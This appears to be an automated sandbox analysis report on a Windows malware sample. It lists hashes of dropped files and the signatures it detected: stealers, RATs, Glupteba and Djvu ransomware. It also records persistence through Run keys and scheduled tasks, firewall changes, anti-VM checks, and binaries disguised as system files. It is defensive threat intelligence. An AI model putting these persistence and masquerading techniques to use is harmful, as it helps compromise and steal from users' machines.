SHA512 a5e9c66a734896ff3a08b2b791fe4463dff945a244a486fb0db67f899f283bde0fc5682dc324b0065e7679781bf7c09b45f9cac332d5b5356c2834535f84dce3

\Users\Admin\AppData\Local\Temp\DE51.exe

MD5 c617562971e5552332875f43dae92533
SHA1 92d2950d251b21da4b5a857b16f062f77179d296
SHA256 132f86e54a7ed28ca3d12789924a03770382eabc5f2ddbf8a72349b4b7e2453f
SHA512 0325463290224213cce0fd1b8488df105b3846a0ca177e9a3a809c9c2d10f200ecee93e1c2662cf532388f705808ea93ed76df98a82cbb31936801b5654b6208

memory/1568-381-0x000000013FDD0000-0x0000000140A32000-memory.dmp

\Windows\rss\csrss.exe

MD5 e06990f0d06b7d15911516f269e3a6ba
SHA1 ad6a54f561cf5bd104102d633563099583b85955
SHA256 8064f14de52225193e4beeb67bba22f365326f8e75c821418652f03c9485036a
SHA512 43b2cb09e0760dd3012738828607ca0a817cb3b5f88be68ed57d8e4c58cbfd15a393cc6686297591efc8305b6e480360017dfc2b540db81c0f3328900cdd1b58

memory/1624-390-0x0000000003880000-0x0000000003C78000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 0bccade864c0d26ce69bb20b4078cc7e
SHA1 07100885604cfae2503a7bbf45d1c1b9cefdc793
SHA256 c33f6fada92bd7d7987696dfbe0967a2d6d290bbb8ea39eea385f3b8b93dd0eb
SHA512 4802d4cdf9f7bb2c77b1ff87e393886583b45b96c5783faa438a7fbd599df5076101c992c81823cfdd678458714a62daaa5df7a3b0d4d11235d85f2fdc13c7ea

\Windows\rss\csrss.exe

MD5 9f34c2e370064241cedad4c516d45abb
SHA1 e46153375c4f9d022835808bc22a9830d3c49a40
SHA256 5c6e0a903792ccd74f468357295e4ba7e523c1ff4b4ea425b84681cc725ad805
SHA512 23cee66a628ee3ea2262aaae1f9486d002e04ccdc21311fd5543441a0ee62c9a5bf2a67a6e45434509b2c29ce902a88b2805297a15a3a9af16aee69cfec288cf

memory/1624-392-0x0000000003880000-0x0000000003C78000-memory.dmp

memory/1088-391-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/1624-393-0x0000000003C80000-0x000000000456B000-memory.dmp

memory/2544-394-0x0000000000ED0000-0x000000000177F000-memory.dmp

memory/1624-395-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 b6189d36e70cbe35c31ed3868422625e
SHA1 6e3df2a994e44b3ab10f7a100d087a386517775e
SHA256 21e27a779afc78bf8dfa75b34a112b062bd522e29eba8ce5c3e43648c0ead0d8
SHA512 ce1e5d1a5909425695bedbe9597246782f469ec69d9b07c4a8459668e2471060f1859ebe1e8e86faef497e53325c4017188b963cfb35336c1dc908bebd096e7a

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 75cf9f6562ff34c3f0d52def91ea9749
SHA1 b07a693940408a71d9c958abe95b7146885788d7
SHA256 25c73a2f36e8c76791011ad0793d78b55abe7c4559139c5d05185ff864bcc89b
SHA512 b6848bc9263515b56e9c614fec192c22c13ab4dd92ca10c7de0bf41fd712c4068b19cda514bf27448c0ad3a24912d4ee74584a041c3a017fce1f4dcbfb9a8fc1

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 be81c865af1555afb8eebadc41ddd23d
SHA1 1b7c70c5993c853abd63ef0979c43d29e5af85b4
SHA256 57a3a50b9879911442aa8288969013c4c4e58819ed6755144a3d184c3a0e5326
SHA512 f535655ad385bd8510a74ccffefde9686c1c3e62f5b09c6a6f1ff31fa62efd2bc01f7e05b440f4cf3ce9a67ef1cb1d9c0bf7f37cc9636dc0bd5720462e149b02

memory/2068-410-0x00000000005D0000-0x0000000000BB8000-memory.dmp

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 da4d522afbbd4bfd319233177d1d29a5
SHA1 0763dafe8fc71605e47b2362d0ae9894c52918d0
SHA256 50d491bb9335a9aca1ecff83423dd210555e63972e373dd7e55d372aaa20fcd1
SHA512 3bdc8435f2f72c77000dce9fa753faad8f32fe2549c2b678b8d4b6126a6c7cc8a39161f987cfad83fd75b4a7d8b586382839b7021d3041e0743cedbd2da087ce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ce8858719d79eed3452092ee81b11f57
SHA1 b39a7a679383ddfd742df2be9aaa8f266b996e89
SHA256 2cdacbb582edb4e554d8a087946a7899b9b6d894249dee8cb93090a1637f5c20
SHA512 ceb3100ccdd39e90ac90c9d316b90a37ff10551f18ad67f3e311c820272c496cf371c1c2e760d7ece3c6ba28abbf9929a733dfba87de6c9918cc0db8d48db26e

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 0a6178814666c904769cb0f68e458af3
SHA1 e5382d19a1d27d64368cbf2225c8acf665cc7dd5
SHA256 49e6370aa9cbf74ced549635578146197d2ac789094cc4d8eeb75c8ad027e850
SHA512 ca382921c45af4624adbc3f0e738899118e924afb4451a925aa17eaa5c6d374eae28ae9a72fadd39f1593cc39422885f855b3f04bdbbb5a4f9f9571ca72f83c0

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 c11e6f45c4ace36caad7e0fc37c29adc
SHA1 54f7e63f9f431653169c8737877a49dc3525802e
SHA256 037ba343cc3876e31e33834401d28c10f3ab0ef11d6157e0d965bca8f0b237fd
SHA512 33d71133bb7414f163cef6314d34f96735bb8ce41a31af98dc6eafbe398020fa669a82cda8a507c88505a8eddc6bbba2886940edaf67ca4d03fb5a5c2b70fe7a

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 e421a139e44cfa762f19f169856dce92
SHA1 a4c28ed01efd28b55d5ae4df38b9ee372c58a4d9
SHA256 eb9366f7df2c1b52e18bc26c62b858ce23f72fe6a1eb16e81bc7a950d0ca9d59
SHA512 c89746ab379e39d55b81cf6bb40be24198f55831549e4920fd965a5be1bc576c5a45feb6204226295dd31158997b6bc1e460fa1fb53ee8bbca26808164261518

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 fa5fe67bbf51720a1810a8c78ba98767
SHA1 8caee866641a5f1f44e488929f3baa14baaf0816
SHA256 515d636ba9a21819b512ca3ed1767fda2334b5cd7c854cc1a55f712104d32113
SHA512 72880a5da5c838b0e26242dd8d12ea4dde40e551982223e598d655210f277996668f8e8259c9f18ea304007a0545ed2764582dc7c999e6fb1868fc56c0605f36

memory/2068-442-0x00000000007A0000-0x0000000000D88000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b11d6fd7ea686d12419300f2087b125e
SHA1 d51f803ad9e34ddc59250ee1a383547207454c15
SHA256 352b00f64ca7be1f4ae360b0e4555456c56c4bedea7c3f06f8a7435887dd4c7a
SHA512 528ce67df59c97c799a707e1e133d7ddee13ecb88424127b37f35e06bde6c1ed543776f4439860d2233107ac84b24705997fbe0c3916fc2871bbcf400fc010d7

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\EDE2.exe

MD5 00e3f4882f137105fd422a68c1abedd2
SHA1 e95713020236e6dc1efedea5deff6680190572b5
SHA256 f54394470bb9a9688de3aacd78430ad27e63803d1968d0c6e65fb0a6ebe94620
SHA512 d37b053a536fbbe581611e71b9c2a2f6a345fd8ca308a360d4573f4a9d1500b614a02923cd3d1194305b430f790c4e644b16f2d415192b58ccd48fbaa0b7207f

C:\Users\Admin\AppData\Local\Temp\EDE2.exe

MD5 36903ff1f3ff595fa0f07a184f2b5c62
SHA1 231f4500ee88f271024365da8d6f2e01f179968f
SHA256 9a5f9fa96d69e821725c4696328b745791448c4c81e69a93ff5085ab174a29d1
SHA512 1607eecbaf48c0a5bb6c13210ca757857664f98dc18f8e78d66d49390ccaf86af9c31d6159d2bb8dfcce50f36b234c70f3accbf77682206c23e2bde1a71f0458

memory/2684-506-0x0000000000F80000-0x000000000152A000-memory.dmp

memory/2684-507-0x0000000072B30000-0x000000007321E000-memory.dmp

memory/2684-508-0x0000000005000000-0x0000000005040000-memory.dmp

memory/2760-528-0x0000000000890000-0x0000000000990000-memory.dmp

memory/1624-531-0x0000000003880000-0x0000000003C78000-memory.dmp

memory/1624-532-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/2068-537-0x00000000005D0000-0x0000000000BB8000-memory.dmp

memory/2684-540-0x0000000072B30000-0x000000007321E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2F75.exe

MD5 f9f0fd78f541e1427a1c531becb20aff
SHA1 5c881f95a2902af550ef160a0a1d8f52ca51f802
SHA256 d94196430230b97ab47ec68df839598c21a9996fe45580a95712be8d561ccaf2
SHA512 6d39115a303fc9c69a2ba18d69438f346e7c4e546a43c41f7c3910f4e7ef13ee4f898826ed250aec77af2b70dc5a10eb81494efdcf33009c23e2829f05e30318

C:\Users\Admin\AppData\Local\Temp\2F75.exe

MD5 1ac1efba731f3020e96754f2472ec55c
SHA1 43dc7ed8b3f4521b118f3deae27a249ce2fe582e
SHA256 2040989b03a916d23217ede49ec52652294eef5000140e4f9819ba164af6de8f
SHA512 3e9ebcf535bf9eaf92ce03605269e90a8c2a9c00b80c65681f7f5ab25d0abfac7deedd12043f2ab93bd289dc8244463997f7670ed2be69028d24287cd0e2abeb

memory/1560-547-0x0000000001280000-0x00000000018D2000-memory.dmp

memory/2684-550-0x0000000005000000-0x0000000005040000-memory.dmp

memory/1560-549-0x0000000005050000-0x0000000005090000-memory.dmp

memory/1560-548-0x0000000072B30000-0x000000007321E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\34C3.exe

MD5 f987e9af00984e438d535ffbcee2c6ed
SHA1 c11fed0146bb3927544fa4616caa2aaf38273253
SHA256 336f07ff04674d30e651ea22fa3de86f0ca7f9588ffb73d2f7623f6016efd5db
SHA512 d5f42a51caff69825485cee2c23fb09a456afadc505aeea8bdbef1186243f085dc3583792ed5995520b8d0710aaf417e58f7e20278266c138de2e4c849686b1d

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 e7db04d67a840dc680bcd3cb6f71ce1a
SHA1 bb2c457d1b56eeedd242346baf85487b21f76ebc
SHA256 3c506e4cd2fb70ab2501011287489a936a950d89f6cefb9845f6310bcbde05b6
SHA512 a89e3afe09e27b124693e8c24cca1d6e13c664981a1ac0c5194a770d8480373db7d99f3a4514d1805a30a281559a017051de05e691784903df287242eca24c2f

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 b9f99ea071fccbb26ff2c02a6d20dd4a
SHA1 73468c2f9c19c09bcbedf7ae97e7665c623428e3
SHA256 c6aea7891b35e84fbaaf0c023da4c69fc5d37890a3333bff07992fffc38416d4
SHA512 d9a31c672e510f2367d0e8d8892de504cf18879f58effd2176876e5e9f953158cb8ee149865d50bf4d5df9e11b10069bf0787bc76b23dcd544625e83e34430fe

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

memory/1268-593-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2300-594-0x00000000002E0000-0x0000000000642000-memory.dmp

memory/2300-596-0x0000000000AB0000-0x0000000000AD6000-memory.dmp

memory/2300-598-0x0000000000A80000-0x0000000000A8E000-memory.dmp

memory/2300-600-0x0000000000A90000-0x0000000000AA0000-memory.dmp

memory/2300-602-0x0000000000AA0000-0x0000000000AB0000-memory.dmp

memory/2300-604-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

memory/2300-606-0x0000000000AF0000-0x0000000000AFE000-memory.dmp

memory/2300-608-0x0000000002340000-0x000000000234E000-memory.dmp

memory/2300-610-0x00000000023F0000-0x0000000002402000-memory.dmp

memory/2300-612-0x00000000023D0000-0x00000000023E0000-memory.dmp

memory/2300-614-0x0000000002430000-0x0000000002446000-memory.dmp

memory/2300-616-0x0000000002550000-0x0000000002562000-memory.dmp

memory/2300-618-0x00000000023E0000-0x00000000023EE000-memory.dmp

memory/2300-620-0x0000000002410000-0x0000000002420000-memory.dmp

memory/2300-622-0x0000000002420000-0x0000000002430000-memory.dmp

memory/2300-624-0x000000001AE30000-0x000000001AE8A000-memory.dmp

memory/2300-626-0x0000000002570000-0x000000000257E000-memory.dmp

memory/2300-628-0x000000001AA00000-0x000000001AA10000-memory.dmp

memory/2300-630-0x000000001AA10000-0x000000001AA1E000-memory.dmp

memory/2300-632-0x000000001AA40000-0x000000001AA58000-memory.dmp

memory/2300-634-0x000000001B300000-0x000000001B34E000-memory.dmp

C:\containerProviderhost\sppsvc.exe

MD5 92bf2463d72a410bf291db2bbb0176f5
SHA1 bcc41c9861ce8ad99e2d951c49c50429b4dc8d7f
SHA256 92883022e82b89d32c6936ad8f94a35ac1eb0c2313656029977aec1b4973b808
SHA512 c803d47482aec6ac9c74ee20b401f03f3f2d4a1cc80770e1cf70319cbb7da715ee204cb15e585dbd6d9df0d9fb81254fdb6f6dae5d2147cbbbd85c3cf5b8d300

memory/2300-649-0x000007FEF4A90000-0x000007FEF547C000-memory.dmp

memory/2300-650-0x000000001B426000-0x000000001B48D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-25 22:45

Reported

2024-02-25 22:48

Platform

win10v2004-20240221-en

Max time kernel

150s

Max time network

153s

Command Line

sihost.exe

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f12340f9-b0e6-42e3-a341-afc21e6d6dfd\\9B28.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\9B28.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Rhadamanthys

stealer rhadamanthys

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3352 created 2572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe C:\Windows\system32\sihost.exe

Vidar

stealer vidar

ZGRat

rat zgrat

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9B28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9B28.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\611E.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\Control Panel\International\Geo\Nation C:\containerProviderhost\runtimenetSvc.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DBD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5343.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f12340f9-b0e6-42e3-a341-afc21e6d6dfd\\9B28.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\9B28.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Windows Media Player\Media Renderer\886983d96e3d3e C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\Windows Mail\fontdrvhost.exe C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\Windows Mail\5b884080fd4f94 C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\csrss.exe C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\886983d96e3d3e C:\containerProviderhost\runtimenetSvc.exe N/A
File created C:\Program Files\Windows Media Player\Media Renderer\csrss.exe C:\containerProviderhost\runtimenetSvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2751 = "Tomsk Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-572 = "China Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2872 = "Magallanes Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" C:\Windows\windefender.exe N/A
